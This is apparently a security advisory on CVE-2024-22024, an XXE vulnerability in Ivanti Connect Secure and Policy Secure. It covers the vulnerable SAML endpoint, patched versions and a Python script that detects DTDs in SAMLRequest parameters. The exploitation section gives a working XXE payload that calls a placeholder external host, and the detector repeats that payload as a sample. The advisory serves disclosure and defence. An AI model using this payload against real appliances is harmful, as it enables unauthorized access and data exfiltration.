
CVE-2024-22024, a newly disclosed vulnerability affecting Ivanti Connect Secure and Ivanti Policy Secure software, poses a significant threat to network security. These software solutions, utilized for connecting devices to virtual private networks (VPNs), are vulnerable to exploitation by remote attackers through maliciously crafted XML files. What exacerbates the situation is the existence of a known, publicly accessible exploit, heightening the urgency for immediate action. 

 

This vulnerability, the latest in a series of high and critical vulnerabilities discovered within a single month (CVE-2024-21893, CVE-2024-21887, CVE-2024-21888), underscores the importance of robust security measures in the face of evolving threats. Particularly concerning is the detection of exploitation of previous vulnerabilities in the wild, raising the possibility of similar exploitation of CVE-2024-22024. 

 

Ivanti Connect Secure and Ivanti Policy Secure, originally developed by Pulse Secure before Ivanti’s acquisition in 2020, are pivotal software solutions facilitating secure communications and network management through VPNs. Organizations utilizing these solutions must prioritize prompt patching and proactive security measures to mitigate the risk posed by CVE-2024-22024 and similar vulnerabilities, safeguarding their network infrastructure from potential exploitation and data breaches. 

Table of Contents:
1. Exploitation Methodology
2. Recommendation
3. Conclusion
 

Exploitation Methodology 

Exploitation requires that the appliance's web service be reachable by the attacker. The vulnerable endpoint is “/dana-na/auth/saml-sso.cgi”.

 



 To exploit it, the attacker simply needs to craft a POST request containing a parameter named “SAMLRequest”, with a malicious XML payload. This payload should include an entity referencing either internal server resources or external addresses. 


The payload is Base64-encoded for transmission.

Payload:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

 To exploit this vulnerability, the payload should be sent as a SAMLRequest parameter to the endpoint 127.0.0.1/dana-na/auth/saml-sso.cgi. The intention is to prompt the vulnerable application (Ivanti Connect Secure) to parse the XML document and interact with the external entity referenced in the payload, potentially resulting in unauthorized access or other security compromises. 
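For defenders, the request shape described above can be detected in proxy or WAF captures by decoding the SAMLRequest parameter and checking for a DTD. The following is an added example, not code from the original article or from Ivanti; the function names, verdict labels and sample requests are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

VULN_PATH = "/dana-na/auth/saml-sso.cgi"  # endpoint named in the article
# A legitimate SAML message has no reason to carry a DTD or entity declaration.
DTD_MARKERS = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def inspect_saml_post(path: str, body: str) -> str:
    """Return 'ignore', 'clean', 'undecodable' or 'dtd-in-samlrequest'."""
    if path.split("?", 1)[0].rstrip("/") != VULN_PATH:
        return "ignore"
    for value in parse_qs(body, keep_blank_values=True).get("SAMLRequest", []):
        raw = value.replace(" ", "+")  # parse_qs turns an unescaped '+' into a space
        try:
            xml = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
        except (binascii.Error, ValueError):
            return "undecodable"  # worth reviewing: not a well-formed SAMLRequest
        # UTF-16 documents interleave NUL bytes, so test a NUL-stripped copy too.
        if DTD_MARKERS.search(xml) or DTD_MARKERS.search(xml.replace(b"\x00", b"")):
            return "dtd-in-samlrequest"
    return "clean"


def form_body(xml: str, encoding: str = "utf-8") -> str:
    """Hypothetical helper: build a form body the way a client would send it."""
    token = base64.b64encode(xml.encode(encoding)).decode("ascii")
    return urlencode({"SAMLRequest": token})


# Constructed sample requests (not captured traffic); example.invalid is a placeholder.
SAMPLES = [
    (VULN_PATH, form_body('<samlp:AuthnRequest xmlns:samlp='
                          '"urn:oasis:names:tc:SAML:2.0:protocol" ID="_a1"/>')),
    (VULN_PATH, form_body('<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe '
                          'SYSTEM "http://example.invalid/x"> %xxe;]><r></r>')),
    (VULN_PATH, "SAMLRequest=***"),
    ("/index.html", "q=1"),
]


def classify_samples() -> list:
    return [inspect_saml_post(path, body) for path, body in SAMPLES]


if __name__ == "__main__":
    for (path, _), verdict in zip(SAMPLES, classify_samples()):
        print(f"{verdict:20} {path}")
```

A 'dtd-in-samlrequest' verdict on traffic to an unpatched appliance is a reason to review that host's outbound connections as well, since the payload works by making the server fetch an external entity.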


 

Recommendation 

 The recommended course of action is to promptly update the Ivanti software to one of the recently patched versions that address this vulnerability. Specifically, for each respective product line, the following versions are advised: 

  • Ivanti Connect Secure: Versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3, and 22.6R2.2 
  • Ivanti Policy Secure: Versions 9.1R17.3, 9.1R18.4, and 22.5R1.2 
  • ZTA gateways: Versions 22.5R1.6, 22.6R1.5, and 22.6R1.7

Concluding Thoughts

 CVE-2024-22024 presents a serious vulnerability in Ivanti Connect Secure and Ivanti Policy Secure software. The existence of a public exploit and the potential for remote attackers to gain unauthorized access to sensitive data necessitates immediate action. Organizations relying on these solutions should prioritize patching their systems to the latest versions mentioned in the recommendation section. This vulnerability highlights the critical need for robust security practices and continuous vigilance against evolving threats. By implementing prompt patching procedures and maintaining proactive security measures, organizations can safeguard their network infrastructure and prevent potential security breaches.
